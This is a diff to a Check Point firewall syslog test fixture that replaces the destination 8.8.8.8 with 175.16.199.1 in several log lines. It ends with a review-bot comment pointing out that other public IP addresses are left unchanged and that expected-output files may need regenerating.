& FireWall-1"; proto:"17"; s_port:"52617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52627"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52525"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52525"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45987"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51188"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10527"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51190"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10528"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51192"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10529"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39978"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 
2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39978"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:24:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e8111f8,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53524"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; 
loguid:"{0x5e8111f8,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50810"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e8111f8,0x2,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53522"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] -<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; 
ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517054"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811223,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47870"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811224,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40806"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10530"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - 
[action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811224,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] 
@@ -5774,7 +5774,7 @@ <134>1 2020-03-29T21:43:49Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e811697,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50812"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-29T21:44:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116b3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49590"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:44:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116da,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42557"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52096"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10579"; xlatesrc:"0.0.0.0"] 
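Review bot: The new side of this hunk swaps `dst:"8.8.8.8"` for `dst:"175.16.199.1"` but leaves other routable public addresses in the same fixture lines unchanged (`dst:"104.99.234.45"`, `dst:"83.98.201.134"`, `dst:"194.29.39.27"` are all still present in the context lines), so if the intent is to keep real public IPs out of the test data the sanitisation is incomplete; the same partial replacement applies to the hunks ending at L1334 and L1341. If the rewrite is instead scoped to one specific address, a short note in the commit description saying why only 8.8.8.8 is replaced would save the next reader from assuming the remaining addresses were missed. If this log fixture has a generated expected-output companion in the module's test directory, it will presumably need regenerating so the `destination.ip`-style fields it asserts on match the new address.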
